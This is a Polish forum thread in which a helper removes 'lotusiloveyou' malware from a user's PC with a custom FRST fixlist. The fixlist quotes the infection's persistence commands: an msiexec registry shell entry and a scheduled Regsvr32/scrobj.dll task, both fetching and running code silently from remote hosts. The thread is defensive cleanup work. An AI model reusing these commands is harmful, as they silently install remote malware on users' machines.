Pibosz Opublikowano 19 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 19 Kwietnia 2017 Witam,To mój pierwszy post na tym forum. Od kilku dni mam problem - avast ciągle wyświetla monity o malware "llotusiloveyou". Z monitu wynika, że jest on związany z procesem Regserv32. Skanowanie nic nie daje, nie usuwa niczego. Zgodnie z informacją na forum przeskanowałem komputer za pomocą FRST i GMER-a, jednak w przypadku tego drugiego nie mogłem zaznaczyć wszystkich elementów do skanowania (jedynie usługi, rejestr i pliki). Na forum avasta znalazłem taką informację z fixlistą dla FRST (https://goo.gl/swsNgs), niestety z tego co widzę każda fixlista musi być dopasowana indywidualnie. W załączniku dodaję raporty ze skanów. Z góry dziękuję za pomoc. Addition.txt FRST.txt GMER.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 19 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 19 Kwietnia 2017 Z monitu wynika, że jest on związany z procesem Regserv32. To sprawka wpisu w Harmonogramie Zadań. Na forum avasta znalazłem taką informację z fixlistą dla FRST (https://goo.gl/swsNgs), niestety z tego co widzę każda fixlista musi być dopasowana indywidualnie. Tak i zastosowanie Fix'a na innym systemie niż, dla którego został napisany grozi jego uszkodzeniem. W systemie jest wstawiony klucz na powłoce Shell oraz w Harmonogramie Zadań, który uruchamia tą stronę. Oprócz tego kasuję resztki po programach, sprzątam w systemie. Są to wpisy infekcyjne. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj88NkZWNkY3FjH5MdzLMkVYFjY8MdU5OWlYRYZQNYRLMq== /q HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 Toolbar: HKU\S-1-5-21-1673507172-2206377428-1642603207-1000 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File S3 dbx; system32\DRIVERS\dbx.sys [X] Task: {671CE90D-BF79-4C3E-A1DE-A8F5F0ABC436} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj88NkZWNkY3FjH5MdzLMkVYFjY8MdU5OWlYRYZQNYRLMq== scrobj.dll C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OSGeo4W\OSGeo4W Shell.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zresetuj synchronizację w przeglądarce Mozilla FireFox - KLIK (nie wiem czy te wpisy, niczego tam nie wstawiły - jak jest to dla Ciebie kolizyjne resetować synchronizację to możesz pominąć). 3. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 4. Zrób nowy log FRST z opcji Skanuj (Scan) (bez Addition i Shortcut). Dołącz też plik fixlog.txt. Odnośnik do komentarza
Pibosz Opublikowano 19 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 19 Kwietnia 2017 Dziękuję za szybką odpowiedź.Zrobiłem wszystko według listy - stworzyłem fixa i uruchomiłem FRST, wyłączyłem synchronizację w Firefoksie, przeskanowałem i oczyściłem AdwCleanerem, na koniec jeszcze raz przeskanowałem FRST. W załączniku wrzucam logi z każdego programu. Ponieważ ten monit wyświetlał się co jakiś czas (1 - 2 h) to dam znać po dłuższej chwili czy te działania pomogły. Jedno mnie zastanawia - AdwCleaner usunął mi Wise Registry Cleaner. To kwestia możliwej infekcji czy faktu, że WRC modyfikuje rejestr i przez to jest potencjalnie niebezpieczny? AdwCleanerC0.txt Fixlog.txt FRST.txt Odnośnik do komentarza
Miszel03 Opublikowano 19 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 19 Kwietnia 2017 Przepraszam, nie zwróciłem uwagi na instalację Wise Registry Cleaner. Gdyby zwrócił prosiłbym tylko o skan bym mógł zweryfikować wyniki. W panelu sterowania w sekcji Programy spróbuj wybrać opcję naprawczą po zaznaczeniu tego programu, gdyby to jednak było niemożliwe to zainstalujesz program od nowa ze strony producenta. Jeśli zaś chodzi o resztę to wszystko pomyślnie wykonana, - system uprzątnięty, infekcja usunięta. Komunikat nie ma prawa już wystąpić. Czekam na odzew dot. stanu problemu na wszelki wypadek, a potem przechodzę do finalizacji tematu. Odnośnik do komentarza
Pibosz Opublikowano 19 Kwietnia 2017 Autor Zgłoś Udostępnij Opublikowano 19 Kwietnia 2017 Dziękuję za pomoc - po problemie. Wise Registry Cleaner zainstaluję sobie raz jeszcze, to nie problem. Temat do zamknięcia. Odnośnik do komentarza
Miszel03 Opublikowano 19 Kwietnia 2017 Zgłoś Udostępnij Opublikowano 19 Kwietnia 2017 W takim razie kończymy. Zastoju DelFix (kasacja używanych narzędzi). Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się